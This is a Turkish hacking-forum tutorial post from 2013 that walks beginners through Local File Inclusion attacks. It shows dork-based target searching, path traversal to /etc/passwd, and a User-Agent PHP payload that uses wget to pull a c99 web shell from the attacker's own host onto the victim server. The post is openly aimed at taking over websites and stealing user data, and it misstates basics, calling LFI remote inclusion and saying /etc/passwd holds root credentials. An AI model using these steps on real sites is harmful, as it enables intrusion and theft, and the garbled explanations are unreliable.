THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

LFI (Geniş Anlatım)

therapiz - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2013
Nereden:
40°,54',46
Mesajlar:
672
Konular:
131
Teşekkür (Etti):
15
Teşekkür (Aldı):
64
Ticaret:
(0) %
13-11-2013 17:37
#1
LFI (Geniş Anlatım)
Sizlere Bugün LFI Açığından Ayrıntılı Olarak Bahsetmeyi Planlıyorum.Bu Anlatımda Hacker Kardeşlerimizin Anlayacağı Dilden Değilde, Bu İşlere Yeni Başlayan Kardeşlerimizin Anlayacağı Dilden Tercume Etmeyi Hedefliyorum.Haydi Başlayalım..

Öncelikle Ana Başlıklarımıza Göz Atalım;

# ) LFI Nedir?
# ) LFI’n Açılımı Nedir?
# ) LFI İle Neler Yapabiliriz?
# ) LFI Açığını Kullanmamız İçin Hangi ****ryellere İhtiyaç Vardır?
# ) Nasıl Ararız?
# ) Saldırı Örneği
# ) Açığı Kullanmak..

LFI Nedir?

LFI Siteye Uzaktan Dosya Dahil Etme Anlamına Gelir.

LFI’n Açılımı Nedir?

Local File İnclude Yani; Yukarıdada Belirttiğim Gibi Türkçe Anlamı Uzaktan Dosya Dahil Etmedir.

LFI İle Neler Yapabiliriz?

Önemli Olan Açığı En Sağlıklı Şekilde Kullanabilmektir.LFI Açığını Bulduğunuz Siteye Shell Sokabilirsiniz.Sokulan Shell Sayesinde de Serverdaki Siteleri + Serverdaki Sitelerdeki Üye Kişilerinde Bilgilerini Ele Geçirmek Mümkündür..

LFI Açığını Kullanmamız İçin Hangi Araç Gereçlere İhtiyaç Vardır?

Açığı Kullanıp Siteye Shell Sokabilmemiz İçin Mozilla Firefox Tarayıcısının Yüklü Olması Gerekir ve Mozillanın Tamper Data Eklentisininde Tarayıcıya Yüklü Olması Gerekir.

$- Nasıl Ararız?

Açığı Arayabilmemiz İçin Dork’a İhtiyacımız Var.

Bu Dorklar; inurl:"index.php?id=concat" vs gibi Dorklar Olabilir.

Google’a Dorkumuzu Aratıyoruz.Karşımıza Çıkan Bir Sitede Açık Tarayalım;

Fononline | Alan Adı, Hosting, Web Site Tasarımı

gibisinden bir sayfa çıkacaktır karşımıza...

Yapmamız gereken şey id= değerinin yanındaki concat yazısını silmek ve;

../../../../../../etc/passwd

yazmak...

http://www.siteadi.com/index.php?id=.../../etc/passwd

Peki hocam diyeceksiniz herşey güzel tamam anladık da yazdığımız ../../../../../../etc/passwd un anlamı nedir?..

etc/passwd dosyasının içinde serverdaki sitelerin root bilgileri mevcuttur.Biz etc/passwd dosyasını uzaktan çağırdığımız için, yani; serverın içinden çağırdığımız için ../../../../ gibi karakterler kullanırız.

Peki sadece etc/passwd dosyasınımı çağırabiliriz?

Tabii ki hayır.! cat /named.conf dosyası gibi serverdaki sitelerin isimlerinin kayıtlı olduğu dosyalarıda çağırabiliriz...

Evet şimdi herşey tamam.Açık olup olmadığını nasıl anlarız diyeceksiniz haliyle.

$-Saldırı Örneği

Evet Arkadaşlar Herşey Tamam..Artık Saldırı Zamanı...

Şimdi Sitemize Tekrar Göz atalım;

http://www.siteadi.com/index.php?id=.../../etc/passwd

Enter’lıyoruz.Karşımıza;

Gördüğünüz Gibi Serverdaki Sitelerin Root Bilgileri Geldi.

Evet Açık Olduğunu Anladık..Şimdi Sıra Bu Açığın;

$-Kullanımı..

Önce Mozilla Tarayıcımızı Açıyoruz ve Açık Bulduğumuz Siteye Giriyoruz.

Tarayıcının Üstü Kısmında Araçlar Sekmesi Mevcut..Buraya Tıklayıp Tamper Data ’yı Açıyoruz..

Start Tamper diyip Sayfayı Tekrar Yeniliyoruz.Gelen Uyarıda Tamper Diyioruz ve



User-Agent Yazan Kısma;

<?system(’wget http://kendisitemiz.com/c99.php -o shell.php’);?>

Yazıyoruz.Burada Yapmamız Gereken Olay Kendi Sitemize Veya Hostumuza Bir Adet Shell Bulundurmak.Burada Yaptığımız Olay İse Kendi Sitemizdeki c99 Shelli Hedef Siteye shell.php olarak Kaydetmektir.

Bu Olayıda Yaptıktan Sonra Tamam Diyoruz ve Gelen Diğer Tüm Yanıtlara Submit Diyoruz.

İşlem Bitti.Hedef Siteye Shellimizi Soktuk.Şimdi Shelli Çagırma Zamanı.

www.siteadi.com/shell.php

Girdiğimiz Zaman Shell’e Başarıyla Giriş Yapmış Bulunuyorsunuz.
Konu therapiz tarafından (13-11-2013 17:42 Saat 17:42 ) değiştirilmiştir.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler